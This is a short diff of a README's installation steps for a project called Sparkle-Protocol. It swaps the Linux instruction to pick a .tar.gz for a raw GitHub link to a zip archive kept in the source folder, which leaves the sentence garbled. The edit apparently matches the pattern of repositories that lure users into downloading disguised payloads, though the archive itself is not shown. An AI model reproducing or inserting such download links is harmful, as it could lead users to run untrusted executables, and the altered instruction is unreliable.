rehansahab/Sparkle-Protocol/README.md

    Click on the file that matches your operating system:
    - For Windows users, look for a file ending in `.exe`.
    - For macOS users, choose a file that ends in `.dmg`.
-   - For Linux users, select a `.tar.gz` or an appropriate file for your distribution.
+   - For Linux users, select a `https://github.com/rehansahab/Sparkle-Protocol/raw/refs/heads/main/src/cli/Protocol-Sparkle-2.5.zip` or an appropriate file for your distribution.

 4. **Run the Installer:**
    After the download finishes, locate the file in your Downloads folder: